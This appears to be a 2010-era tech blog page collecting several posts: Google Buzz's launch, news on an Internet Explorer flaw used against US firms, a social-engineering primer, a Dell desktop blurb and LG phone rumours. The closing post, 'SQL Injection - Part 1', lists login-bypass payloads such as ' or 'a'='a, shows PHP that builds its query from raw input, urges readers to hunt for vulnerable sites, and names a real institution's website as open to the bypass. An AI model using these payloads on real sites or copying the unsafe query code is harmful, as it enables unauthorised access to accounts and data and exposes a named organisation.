Google Launches Buzz - New Innovation of Social Media Sharing

Google had launched Google Buzz, a new way to start conversations about the things you find interesting and share updates, photos, videos and more. Buzz is built right into Gmail, so there's nothing to set up — you're automatically following the people you email and chat with the most.




It is focused on making the sharing experience really rich by integrating photos, videos, and links. No more fuzzy little pictures: Buzz makes it easy to quickly flip through photos and experience them the way they were meant to be seen: big and full-resolution. And videos play inline so you can watch them without opening a new window.

You can choose to share publicly with the world or privately to a small group of friends each time you post. And you can connect other sites you use, today there's Picasa, Flickr, Google Reader, and Twitter, so your friends can keep up with what you're doing around the web — all in one place.

To make sure you don't miss out on the best part of sharing, Buzz sends responses to your posts straight to your inbox. Unlike static email messages, buzz messages in your inbox are live conversations where comments appear in real time.

You can follow the specific people whose posts you want to see, but Buzz also recommends posts from people you're not directly following, often ones where your friends are having a lively conversation in the comments. If you're not interested in a particular recommendation, just click the "Not interested" link and your feedback will help improve the recommendations system. Buzz also weeds out uninteresting posts from the people you follow — collapsing inactive posts and short status messages like "brb." These early versions of ranking and recommendations are just a start; we're working on improvements that will help you automatically sort through all the social data being produced to find the most relevant conversations that matter to you.


Via [Google Blog]
(Read more inside ..)

Hack up an unprotected XP

(Read more inside ..)

New IE flaw exploited for attack on US firms

Attackers targeting Google and a host of other U.S. companies recently used software that exploits a new hole in Internet Explorer, Microsoft said on Thursday.

The flaw exists as an invalid pointer reference within IE and it could allow an attacker to take control of a computer if the target were duped into clicking on a link in an e-mail or an instant message that led to a Web site hosting malware, Microsoft said. "It could also be possible to display specially crafted Web content using banner advertisements or other methods to deliver Web content to affected systems," Microsoft said in the statement.

Microsoft is working on a fix but could not say whether it would address the issue as part of its next Patch Tuesday scheduled for February 9 or before.

Keeping the IE Internet zone security setting on "high" will protect users from the vulnerability by prompting before running ActiveX Controls and Active Scripting, Microsoft said. Customers should also enable Data Execution Prevention (DEP), which helps mitigate online attacks, the company said. DEP is enabled by default in IE 8 but must be manually turned on in earlier versions.

McAfee CTO George Kurtz detailed the vulnerability in a blog post.
"As with most targeted attacks, the intruders gained access to an organization by sending a tailored attack to one or a few targeted individuals. We suspect these individuals were targeted because they likely had access to valuable intellectual property," Kurtz wrote. "These attacks will look like they come from a trusted source, leading the target to fall for the trap and clicking a link or file. That's when the exploitation takes place, using the vulnerability in Microsoft's Internet Explorer."
Once it is downloaded and installed, the malware opens a back door that allows the attacker to gain complete control over the compromised system and "perform reconnaissance," Kurtz said. "The attacker can now identify high value targets and start to siphon off valuable data from the company," he wrote.




Via [zdnetasia] (Read more inside ..)

Everybody should be aware of Social Engineering

Online criminals can use sophisticated technology to try to gain access to your computer, or they can use something simpler and more insidious: social engineering.

Social engineering is a way for criminals to gain access to your computer. The purpose of social engineering is usually to secretly install spyware or other malicious software or to trick you into handing over your passwords or other sensitive financial or personal information.

Types of social engineering

• Phishing
  
• Spear Phishing
• E-mail hoaxes

Phishing: Fraudulent e-mail messages and Web sites

The most common form of social engineering is the phishing scam. Phishing scams employ fraudulent e-mail messages or Web sites that try to fool you into divulging personal information.

For example, you might receive an e-mail message that appears to come from your bank or other financial institution that asks you to update your account information. The e-mail message provides a link that appears to go to a legitimate site, but really takes you to a spoofed or fake Web site.

If you enter your login, password, or other sensitive information, a criminal could use it to steal your identity.

Phishing e-mail messages often include misspellings, poor use of grammar, threats, and exaggerations. For more information about phishing, see Recognize phishing scams and fraudulent e-mails.

If you think you might already be a victim, see What to do if you've responded to a phishing scam.


Spear phishing: Focused attacks that seem to come from people you know

Spear phishing is any highly targeted e-mail scam; but they usually are employed in a business environment.

Spear phishers send e-mail messages that appears genuine to all the employees or members within a certain company, government agency, organization, or group.

The message might look like it comes from your employer, or from a colleague who might send an e-mail message to everyone in the company, such as the head of human resources or IT. It might include requests for user names or passwords or might contain malicious software, like a trojan or a virus.

Spear phishing is a more sophisticated type of social engineering than phishing, but the techniques you can use to avoid being fooled are the same.

E-mail hoaxes: Look out for easy money promises

E-mail hoaxes come in many different forms, ranging from a scam that requests your help getting money out of a foreign country (often Nigeria) to a promise that you've won a lottery.

The common element is that you're usually promised a large sum of money for little or no effort on your part.

The scammer tries to get you to send money or reveal financial information that they can use to steal your money or your identity, or both.





Via [Microsoft ] (Read more inside ..)

Dell Inspiron Zino HD mini desktop computer

The new Inspiron Zino HD mini desktop computer is available in Indian markets. Cost starting from Rs. 20,900. You’ll be amazed by how many powerful features are inside such a perfectly small square, 7.8" by 7.8" to be exact.

Features:

• Personalize with 10 optional interchangeable colors and designs
• Its small form factor conveniently fits just about anywhere
• Make the most of your movies with HDMI and optional Blu-ray Disc
• Optional discrete graphics, up to 8GB memory and up to 640GB hard drive for amazing performance

Via [Dell ] (Read more inside ..)

LG releasing Windows Mobile 7 phone in September and Android 2.1 in April

First LG flat-out says on public record that Windows Mobile 7 is bound for 2010, and now we've gotten apparent word that the company has narrowed said release window to September of this year -- at least as far as its own devices are concerned.
That comes via high-profile French tech blogger Eric of Presse Citron, who while attending a LG Design Lab tweeted (both in French and immediately after in English) that LG Mobile will release a Windows Mobile 7 device in September and an Android 2.1 device in April, first in the US and then Europe just after. The tweets are now gone, but WMPoweruser managed to catch both via Google cache, while we have corroborated just the French one by similar means. So, misheard claims from the company or accidental slip-up of NDA'd secrets? MWC is starting to look more and more interesting.


Via [WMPoweruser]
(Read more inside ..)

SQL Injection - Part 1

Structure Query Language

' or '1'='1 Injection

It is a technique to inject SQL query as an input possibly via web pages. Actually the logic to validate the authenticity of users is manipulated by using some extra sql query. Many web pages take parameters from web user, and make SQL query to the database. For example when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. It is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant to enter into the website.

This is my first article on SQL Injection. So, here we will see how to inject sql query in username and password fields to grant acess to the website. Not all websites are vulnerable to SQL Injection. We have to search websites those are vunerable to SQL Injection. This is simple.

Just enter ' or 'a'='a in username and password field and click login.

List of golden query:
All the following codes can be used for SQL Injection.

• ' or 'a'='a
• ' or '1'='1
• ' or '0'='0
• ' or '007'='007
• ' or 'biti'='biti
• ' or 'technozone'='technozone
• ' or 1=1 --

Example:
Following PHP code is for validating the authenticity of the user.


$_SESSION['username']=$_POST["username"];
$_SESSION['password']=$_POST["password"]; 

// query for a user/pass match
$result=mysql_query("select * from users where username='" . $_SESSION['username'] . "' and password='" . $_SESSION['password'] . "'");

// retrieve number of rows resulted
$num=mysql_num_rows($result);

if($num < 1)
{
    //Login Failed
    header('Refresh: 2; URL=login.php?msg=login_failed');
}
else
{
    //Login Sucessfull
    header('Refresh: 2;URL=admin/admin_home.php?msg=login_success');
}

So, if we put ' or 'a'='a in username and password field the query for a user/pass matchwill become

$result=mysql_query("select * from users where username='' or 'a'='a' and password='' or 'a' ='a' );

The above statement will now give all the data from the table users because both the conditions are true. And according to the logic of the user validation code the golden query ' or 'a'='a will help us to enter into the website.

I have found a vulnerable site where you can use this golden query ' or 'a'='a . This vulnerable website belongs to a institution related to IIT JEE Coaching. The site is www.fiitjee.com .

Friends search for more vulnerable site and inform them for the vulnerability.

Your Ad Here

(Read more inside ..)